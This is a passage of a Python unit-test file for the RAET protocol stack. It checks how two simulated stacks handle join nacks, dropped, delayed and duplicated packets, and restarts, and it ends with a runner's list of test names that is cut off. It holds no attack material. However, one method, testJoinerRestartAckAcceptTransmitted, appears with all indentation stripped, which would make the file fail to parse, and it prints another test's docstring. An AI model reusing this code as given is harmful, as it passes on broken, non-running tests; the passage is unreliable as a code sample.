        alpha.remotes.values()[0].fuid = 0 # vacuous
        # Test:
        alpha.clearStats()
        console.terse("\nTest joinent nack packet pack error *********\n")
        alpha.join() # Join
        self.serviceStacks([alpha], duration=0.1) # alpha send join
        # Update max packet size to make packet.pack fail; restore after
        default_size = raeting.UDP_MAX_PACKET_SIZE
        raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
        self.serviceStacks([beta], duration=0.1) # beta read response, nack
        raeting.UDP_MAX_PACKET_SIZE = default_size
        self.assertIn('packing_error', beta.stats)
        self.assertEqual(beta.stats['packing_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentNackRenew(self):
        '''
        Test joinent.nack with 'renew' kind (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentNackRenew.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        alpha.clearStats()
        beta.join()
        self.serviceStacks([beta], duration=0.1) # request join
        self.serviceStacks([alpha], duration=0.1) # handle, response
        self.assertEqual(len(alpha.transactions), 1)
        # nack alpha's joinent transaction with a renew kind
        alpha.transactions[0].nack(kind=raeting.PcktKind.renew.value)
        # Checks
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentNackUnknown(self):
        '''
        Test joinent.nack with 'unknown' kind (cover 'else' case) (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentNackUnknown.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        alpha.clearStats()
        beta.join()
        self.serviceStacks([beta], duration=0.1) # request join
        self.serviceStacks([alpha], duration=0.1) # handle, response
        self.assertEqual(len(alpha.transactions), 1)
        # nack alpha's joinent transaction with an unhandled kind
        alpha.transactions[0].nack(kind=raeting.PcktKind.unknown.value)
        # Checks
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testFirstJoinRequestDropped(self):
        '''
        Test network dropped first join request (redo timeout)
        '''
        console.terse("{0}\n".format(self.testFirstJoinRequestDropped.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent didn't received first packet, redo timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # send join request
        self.flushReceives(alpha) # drop the first request
        self.serviceStacks(stacks, duration=2.0) # timeout, redo, join
        self.assertIn('joiner_tx_join_redo', beta.stats)
        self.assertEqual(beta.stats['joiner_tx_join_redo'], 1) # 1 redo
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testAllJoinRequestsDropped(self):
        '''
        Test network dropped all join requests (transaction timeout)
        '''
        console.terse("{0}\n".format(self.testAllJoinRequestsDropped.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent didn't received any request, transaction timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacksDropRx(stacks, drop=[alpha], duration=10.0) # redo timeout, transaction timeout, drop
        self.assertIn('joiner_tx_join_redo', beta.stats)
        self.assertEqual(beta.stats['joiner_tx_join_redo'], 2) # 2 redo
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertIsNone(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testFirstJoinAcceptDropped(self):
        '''
        Test network dropped first join ack response (redo timeout)
        '''
        console.terse("{0}\n".format(self.testFirstJoinAcceptDropped.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joiner didn't received first accept, redo timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # beta: send join
        self.serviceStacks([alpha], duration=0.1) # alpha: process join, send ack
        self.flushReceives(beta) # drop the first accept
        self.serviceStacks(stacks, duration=2.0) # alpha: timeout, redo ack
        self.assertIn('joinent_tx_accept_redo', alpha.stats)
        self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 1) # 1 redo
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testAllJoinAcceptDropped(self):
        '''
        Test network dropped all join accepts (transaction timeout)
        '''
        console.terse("{0}\n".format(self.testAllJoinAcceptDropped.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joiner didn't received any accept, transaction timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacksDropRx(stacks, drop=[beta], duration=10.0) # both ends timed out, drop transactions
        self.assertIn('joiner_tx_join_redo', beta.stats)
        self.assertEqual(beta.stats['joiner_tx_join_redo'], 2) # 2 redo
        self.assertIn('duplicate_join_attempt', alpha.stats)
        self.assertEqual(alpha.stats['duplicate_join_attempt'], 2) # 2 redo join received
        self.assertIn('joinent_tx_accept_redo', alpha.stats)
        self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 5) # 5 redo accept
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertIsNone(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testFirstJoinAckAcceptDropped(self):
        '''
        Test network dropped first join ack accept response (redo timeout, stale refuse)
        '''
        console.terse("{0}\n".format(self.testFirstJoinAckAcceptDropped.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent didn't received ack accept, redo timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # beta: send join
        self.serviceStacks([alpha], duration=0.1) # alpha: process join, send ack
        self.serviceStacks([beta], duration=0.1) # beta: send ack accept, remove
        self.flushReceives(alpha) # drop beta's ack accept
        self.serviceStacks(stacks, duration=2.0) # alpha: timeout, redo ack; beta: stale, refuse
        self.serviceStacks(stacks, duration=2.0) # alpha: timeout, redo ack; beta: stale, refuse
        self.assertIn('stale_correspondent_nack', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_nack'], 1) # 1 stale refuse
        self.assertIn('joinent_tx_accept_redo', alpha.stats)
        self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 1) # 1 redo
        self.assertIn('joinent_rx_nack', alpha.stats)
        self.assertEqual(alpha.stats['joinent_rx_nack'], 1) # 1 nack received
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
        self.assertTrue(beta.remotes.values()[0].joined)
        self.assertIsNone(alpha.remotes.values()[0].joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testAllJoinAckAcceptDropped(self):
        '''
        Test network dropped all join ack accepts (transaction timeout)
        '''
        console.terse("{0}\n".format(self.testAllJoinAckAcceptDropped.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent didn't received any ack accept, transaction timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # beta: send join
        self.serviceStacks([alpha], duration=0.1) # alpha: process join, send ack
        self.serviceStacks([beta], duration=0.1) # beta: send ack accept, remove
        # Drop everything alpha would receive until its transaction times out.
        self.serviceStacksDropRx(stacks, drop=[alpha], duration=10.0)
        # alpha: redo timeout, transaction timeout, drop
        # beta: nack refuse since transaction is already removed
        self.assertIn('stale_correspondent_nack', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_nack'], 5) # 5 redo received
        self.assertIn('joinent_tx_accept_redo', alpha.stats)
        self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 5) # 5 redo accept
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
        # beta completed its join; alpha timed out and stayed unjoined
        self.assertTrue(beta.remotes.values()[0].joined)
        self.assertIsNone(alpha.remotes.values()[0].joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testFirstJoinRequestDelayed(self):
        '''
        Test network delayed request so ack has been received after redo was sent.
        '''
        console.terse("{0}\n".format(self.testFirstJoinRequestDelayed.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent received both request and redo *********\n")
        beta.join() # join from beta to alpha
        # Service only beta long enough for a redo to fire, so alpha later
        # receives both the original request and the redo.
        self.serviceStacks([beta], duration=1.5) # send join and redo
        self.serviceStacks(stacks) # service delayed messages
        self.assertIn('joiner_tx_join_redo', beta.stats)
        self.assertEqual(beta.stats['joiner_tx_join_redo'], 1) # 1 redo
        self.assertIn('duplicate_join_attempt', alpha.stats)
        self.assertEqual(alpha.stats['duplicate_join_attempt'], 1) # 1 duplicate on alpha
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined) # join still completes despite the duplicate
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testAllJoinRequestsDelayed(self):
        '''
        Test network delayed all join requests (joiner receive response after transaction dropped)
        '''
        console.terse("{0}\n".format(self.testAllJoinRequestsDelayed.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joiner received ack after transaction timeout *********\n")
        beta.join() # join from beta to alpha
        # Only beta is serviced until its transaction times out and is dropped.
        self.serviceStacks([beta], duration=10.0) # redo timeout, packet timeout, drop
        self.serviceStacks(stacks) # alpha: 1 ack, 2 drop; beta: stale nack; alpha: refuse
        for stack in stacks:
            self.assertEqual(len(stack.txes), 0) # ensure both stacks done
        self.assertIn('joiner_tx_join_redo', beta.stats)
        self.assertEqual(beta.stats['joiner_tx_join_redo'], 2) # 2 redo
        self.assertIn('stale_correspondent_attempt', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_attempt'], 1) # 1 stale attempt
        self.assertIn('stale_correspondent_nack', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_nack'], 1) # 1 stale nack answer
        self.assertIn('duplicate_join_attempt', alpha.stats)
        self.assertEqual(alpha.stats['duplicate_join_attempt'], 2) # 2 redo
        self.assertIn('joinent_rx_nack', alpha.stats)
        self.assertEqual(alpha.stats['joinent_rx_nack'], 1) # 1 stale nack on other
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertIsNone(remote.joined) # neither side completed the join
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testFirstJoinAcceptDelayed(self):
        '''
        Test network delayed response so it has been received after redo.
        '''
        console.terse("{0}\n".format(self.testFirstJoinAcceptDelayed.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joiner received both accept and redo *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # send join
        # Service only alpha long enough that its accept redo fires too,
        # so beta later receives the accept twice.
        self.serviceStacks([alpha], duration=0.2) # send ack and redo
        self.serviceStacks(stacks) # service delayed messages
        self.assertIn('stale_correspondent_nack', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_nack'], 1) # 1 stale refuse
        self.assertIn('joinent_tx_accept_redo', alpha.stats)
        self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 1) # 1 redo
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined) # join completes despite the duplicate accept
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testAllJoinAcceptsDelayed(self):
        '''
        Test network delayed all join accepts (joinent receive ack accept after transaction dropped)
        '''
        console.terse("{0}\n".format(self.testAllJoinAcceptsDelayed.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent received ack accept after transaction timeout *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # send join
        # Only alpha is serviced until its transaction redoes itself out and drops.
        self.serviceStacks([alpha], duration=10.0) # alpha: redo, remove
        self.serviceStacks(stacks)
        for stack in stacks:
            self.assertEqual(len(stack.txes), 0) # ensure both stacks done
        self.assertIn('stale_correspondent_nack', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_nack'], 5) # 5 stale nack answer
        self.assertIn('joinent_tx_accept_redo', alpha.stats)
        self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 5) # 5 redo
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
        # beta joined from the delayed accepts; alpha's transaction died first
        self.assertIsNone(alpha.remotes.values()[0].joined)
        self.assertTrue(beta.remotes.values()[0].joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinRequestDuplicated(self):
        '''
        Test network duplicated join request (joiner ack both, joinent drop second)
        '''
        console.terse("{0}\n".format(self.testJoinRequestDuplicated.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joiner received the same request twice *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # send join
        self.dupReceives(alpha) # duplicate the pending join request in alpha's rx queue
        self.serviceStacks(stacks) # beta: 1 req; alpha: 1 ack, 1 drop; beta: ack
        self.assertIn('duplicate_join_attempt', alpha.stats)
        self.assertEqual(alpha.stats['duplicate_join_attempt'], 1) # 1 dup
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined) # duplicate is harmless; join completes
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinAcceptDuplicated(self):
        '''
        Test network duplicated join ack response (stale nack the second one)
        '''
        console.terse("{0}\n".format(self.testJoinAcceptDuplicated.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joiner received response twice *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # Send join
        self.serviceStacks([alpha], duration=0.1) # Send ack
        self.dupReceives(beta) # duplicate response
        self.serviceStacks([beta, alpha]) # beta: 1st accept, 2nd stale nack
        self.assertIn('stale_correspondent_attempt', beta.stats)
        self.assertEqual(beta.stats['stale_correspondent_attempt'], 1) # 1 stale attempt (dup)
        self.assertIn('stale_packet', alpha.stats)
        self.assertEqual(alpha.stats['stale_packet'], 1) # 1 stale nack on alpha (dup)
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined) # duplicate is harmless; join completes
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinAckAcceptDuplicated(self):
        '''
        Test network duplicated join ack accept (stale drop the second one)
        '''
        console.terse("{0}\n".format(self.testJoinAckAcceptDuplicated.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nTest joinent received ack accept twice *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta], duration=0.1) # Send join
        self.serviceStacks([alpha], duration=0.1) # Send ack
        self.serviceStacks([beta], duration=0.1) # Send ack accept
        self.dupReceives(alpha) # duplicate response
        self.serviceStacks(stacks) # alpha: 1st accept, 2nd stale drop
        self.assertIn('stale_packet', alpha.stats)
        self.assertEqual(alpha.stats['stale_packet'], 1) # 1 stale drop on alpha (dup)
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined) # duplicate is harmless; join completes
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerRestartNothingTransmitted(self):
        '''
        Test joiner dies before the message is transmitted (die)
        '''
        console.terse("{0}\n".format(self.testJoinerRestartNothingTransmitted.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nSend join request *********\n")
        beta.join() # join from beta to alpha; nothing serviced, so nothing is sent
        console.terse("\nRestart beta *********\n")
        # shutdown beta and rebuild it from scratch (simulates process restart)
        beta.server.close()
        beta.clearAllKeeps()
        beta, betaData = self.bootstrapStack(name='beta', ha=('', raeting.RAET_TEST_PORT), auto=raeting.AutoMode.once.value)
        stacks = [alpha, beta]
        self.serviceStacks(stacks)
        # alpha never saw a request; the restarted beta has no remotes at all
        self.assertEqual(len(alpha.transactions), 0)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(alpha.remotes.values()[0].joined, None)
        self.assertEqual(len(beta.transactions), 0)
        self.assertEqual(len(beta.remotes), 0)
        console.terse("\nJoin beta again *********\n")
        # allow alpha to re-accept the restarted beta's new keys
        alpha.keep.auto = raeting.AutoMode.always.value
        alpha.mutable = True
        self.join(beta, alpha)
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerRestartRequestTransmitted(self):
        '''
        Test joiner dies after a message transmitted (die)
        '''
        console.terse("{0}\n".format(self.testJoinerRestartRequestTransmitted.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nSend join request *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta]) # transmit
        console.terse("\nRestart beta *********\n")
        # shutdown beta and rebuild it from scratch (simulates process restart)
        beta.server.close()
        beta.clearAllKeeps()
        beta, betaData = self.bootstrapStack(name='beta', ha=('', raeting.RAET_TEST_PORT), auto=raeting.AutoMode.once.value)
        stacks = [alpha, beta]
        self.serviceStacks(stacks)
        # transaction still alive on alpha
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(alpha.remotes.values()[0].joined, None)
        self.assertEqual(len(beta.transactions), 0)
        self.assertEqual(len(beta.remotes), 0)
        console.terse("\nJoin beta again *********\n")
        # allow alpha to re-accept the restarted beta's new keys
        alpha.keep.auto = raeting.AutoMode.always.value
        alpha.mutable = True
        self.join(beta, alpha)
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerRestartAckAcceptTransmitted(self):
'''
Test joiner dies after join done (die)
'''
console.terse("{0}\n".format(self.testJoinerRestartRequestTransmitted.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nSend join request *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta]) # transmit request
self.serviceStacks([alpha]) # ack
self.serviceStacks([beta]) # ack accept
console.terse("\nRestart beta *********\n")
# shutdown beta
beta.server.close()
beta.clearAllKeeps()
beta, betaData = self.bootstrapStack(name='beta', ha=('', raeting.RAET_TEST_PORT), auto=raeting.AutoMode.once.value)
stacks = [alpha, beta]
self.serviceStacks(stacks)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 1)
self.assertTrue(alpha.remotes.values()[0].joined)
self.assertEqual(len(beta.transactions), 0)
self.assertEqual(len(beta.remotes), 0)
console.terse("\nJoin beta again *********\n")
alpha.keep.auto = raeting.AutoMode.always.value
alpha.mutable = True
self.join(beta, alpha)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentRestartBeforeAck(self):
        '''
        Test joinent dies before send ack (die)
        '''
        console.terse("{0}\n".format(self.testJoinentRestartBeforeAck.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nSend join request *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta]) # transmit request
        alpha.serviceAllRx() # receive and handle, not send
        console.terse("\nRestart alpha *********\n")
        # shutdown alpha and rebuild it from scratch (simulates process restart)
        alpha.server.close()
        alpha.clearAllKeeps()
        alpha, alphaData = self.bootstrapStack(name='alpha', ha=('', raeting.RAET_PORT),
                                               auto=raeting.AutoMode.always.value, mutable=True, main=True)
        stacks = [alpha, beta]
        # allow beta to re-accept the restarted alpha's new keys
        beta.keep.auto = raeting.AutoMode.always.value
        beta.mutable = True
        self.serviceStacks(stacks)
        # beta's redo re-drives the join against the restarted alpha
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentRestartAckSent(self):
        '''
        Test joinent dies after ack sent (die)
        '''
        console.terse("{0}\n".format(self.testJoinentRestartAckSent.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        stacks = [alpha, beta]
        for stack in stacks:
            stack.remotes.values()[0].joined = None # force unjoin both
            stack.clearStats()
        console.terse("\nSend join request *********\n")
        beta.join() # join from beta to alpha
        self.serviceStacks([beta]) # transmit request
        self.serviceStacks([alpha]) # receive and handle, send ack
        console.terse("\nRestart alpha *********\n")
        # shutdown alpha and rebuild it from scratch (simulates process restart)
        alpha.server.close()
        alpha.clearAllKeeps()
        alpha, alphaData = self.bootstrapStack(name='alpha', ha=('', raeting.RAET_PORT),
                                               auto=raeting.AutoMode.always.value, mutable=True, main=True)
        stacks = [alpha, beta]
        # allow beta to re-accept the restarted alpha's new keys
        beta.keep.auto = raeting.AutoMode.always.value
        beta.mutable = True
        self.serviceStacks(stacks)
        # beta finished its join against the old alpha; restarted alpha knows nothing
        self.assertEqual(len(alpha.transactions), 0)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(beta.transactions), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertTrue(beta.remotes.values()[0].joined)
        console.terse("\nJoin beta again *********\n")
        alpha.keep.auto = raeting.AutoMode.always.value
        alpha.mutable = True
        self.join(beta, alpha)
        for stack in stacks:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            remote = stack.remotes.values()[0]
            self.assertTrue(remote.joined)
        for stack in stacks:
            stack.server.close()
            stack.clearAllKeeps()
def runOne(test):
    '''
    Run one named BasicTestCase test method through unittest.
    '''
    case = BasicTestCase(test)
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(unittest.TestSuite([case]))
def runSome():
    '''
    Unittest runner

    Builds a suite from the explicit list of BasicTestCase test-method
    names below and runs it with verbose output. Keep this list in sync
    with the methods defined on BasicTestCase.
    '''
    tests = []
    names = [
             'testJoinBasic',
             'testJoinJointVacuuousMain',
             'testJoinJointVacuuousMainWithMain',
             'testJoinentVacuousImmutableRejectNewMain',
             'testJoinentVacuousImmutableRejectNewKind',
             'testJoinentVacuousImmutableRejectNewRha',
             'testJoinentVacuousImmutableRejectNewFuid',
             'testJoinentVacuousImmutableRejectNewKeys',
             'testJoinentVacuousImmutableRejectNewRole',
             'testJoinentVacuousRejectedRejectNewKeys',
             'testJoinentVacuousRejectedRejectNewRole',
             'testJoinentVacuousRejectedRejectSameRoleKeys',
             'testJoinentVacuousRejectedRejectSameAll',
             'testJoinentVacuousEphemeralRejectedRejectSameall',
             'testJoinentVacuousAcceptNewMain',
             'testJoinentVacuousAcceptNewKind',
             'testJoinentVacuousAcceptNewRha',
             'testJoinentVacuousAcceptNewFuid',
             'testJoinentVacuousAcceptNewKeys',
             'testJoinentVacuousAcceptNewRole',
             'testJoinentVacuousAcceptSameAll',
             'testJoinentVacuousEphemeralAcceptSameall',
             'testJoinentVacuousPendingPendNewMain',
             'testJoinentVacuousPendingPendNewKind',
             'testJoinentVacuousPendingPendNewRha',
             'testJoinentVacuousPendingPendNewFuid',
             'testJoinentVacuousPendingPendNewRole',
             'testJoinentVacuousPendingPendSameAll',
             'testJoinentVacuousEphemeralPendingPendSameAll',
             'testJoinentNonVacuousImmutableRejectNewName',
             'testJoinentNonVacuousImmutableRejectNewMain',
             'testJoinentNonVacuousImmutableRejectNewKind',
             'testJoinentNonVacuousImmutableRejectNewRha',
             'testJoinentNonVacuousImmutableRejectNewFuid',
             'testJoinentNonVacuousImmutableRejectNewKeys',
             'testJoinentNonVacuousImmutableRejectNewRole',
             'testJoinentNonVacuousRejectedRejectNewKeys',
             'testJoinentNonVacuousRejectedRejectNewRole',
             'testJoinentNonVacuousRejectedRejectSameAll',
             'testJoinentNonVacuousRejectedRejectSameRoleKeys',
             'testJoinentNonVacuousAcceptNewName',
             'testJoinentNonVacuousAcceptNewMain',
             'testJoinentNonVacuousAcceptNewKind',
             'testJoinentNonVacuousAcceptNewRha',
             'testJoinentNonVacuousAcceptNewFuid',
             'testJoinentNonVacuousAcceptNewRole',
             'testJoinentNonVacuousAcceptNewKeys',
             'testJoinentNonVacuousAcceptSameAll',
             'testJoinentNonVacuousPendingPendNewName',
             'testJoinentNonVacuousPendingPendNewMain',
             'testJoinentNonVacuousPendingPendNewKind',
             'testJoinentNonVacuousPendingPendNewRha',
             'testJoinentNonVacuousPendingPendNewFuid',
             'testJoinentNonVacuousPendingPendNewRole',
             'testJoinentNonVacuousPendingPendSameAll',
             'testJoinerVacuousImmutableRejectNewName',
             'testJoinerVacuousImmutableRejectNewMain',
             'testJoinerVacuousImmutableRejectNewKind',
             'testJoinerVacuousImmutableRejectNewKeys',
             'testJoinerVacuousImmutableRejectNewRole',
             'testJoinerVacuousRejectedRejectNewKeys',
             'testJoinerVacuousRejectedRejectNewRole',
             'testJoinerVacuousRejectedRejectSameAll',
             'testJoinerVacuousRejectedRejectSameRoleKeys',
             'testJoinerVacuousRejectedNorenewRejectSameAll',
             'testJoinerVacuousAcceptNewName',
             'testJoinerVacuousAcceptNewMain',
             'testJoinerVacuousAcceptNewKind',
             'testJoinerVacuousAcceptNewKeys',
             'testJoinerVacuousAcceptNewRole',
             'testJoinerVacuousAcceptSameAll',
             'testJoinerVacuousNorenewAcceptSameAll',
             'testJoinerVacuousPendingPendNewName',
             'testJoinerVacuousPendingPendNewMain',
             'testJoinerVacuousPendingPendNewKind',
             'testJoinerVacuousPendingPendNewRole',
             'testJoinerVacuousPendingPendSameAll',
             'testJoinerVacuousPendingNorenewPendSameAll',
             'testJoinerNonVacuousImmutableRejectNewName',
             'testJoinerNonVacuousImmutableRejectNewMain',
             'testJoinerNonVacuousImmutableRejectNewKind',
             'testJoinerNonVacuousImmutableRejectNewRha',
             'testJoinerNonVacuousImmutableRejectNewFuid',
             'testJoinerNonVacuousImmutableRejectNewKeys',
             'testJoinerNonVacuousImmutableRejectNewRole',
             'testJoinerNonVacuousRejectedRejectNewKeys',
             'testJoinerNonVacuousRejectedRejectNewRole',
             'testJoinerNonVacuousRejectedRejectSameRoleKeys',
             'testJoinerNonVacuousRejectedRejectSameAll',
             'testJoinerNonVacuousAcceptNewName',
             'testJoinerNonVacuousAcceptNewMain',
             'testJoinerNonVacuousAcceptNewKind',
             'testJoinerNonVacuousAcceptNewRha',
             'testJoinerNonVacuousAcceptNewFuid',
             'testJoinerNonVacuousAcceptNewRole',
             'testJoinerNonVacuousAcceptNewKeys',
             'testJoinerNonVacuousAcceptSameAll',
             'testJoinerNonVacuousPendingPendNewName',
             'testJoinerNonVacuousPendingPendNewMain',
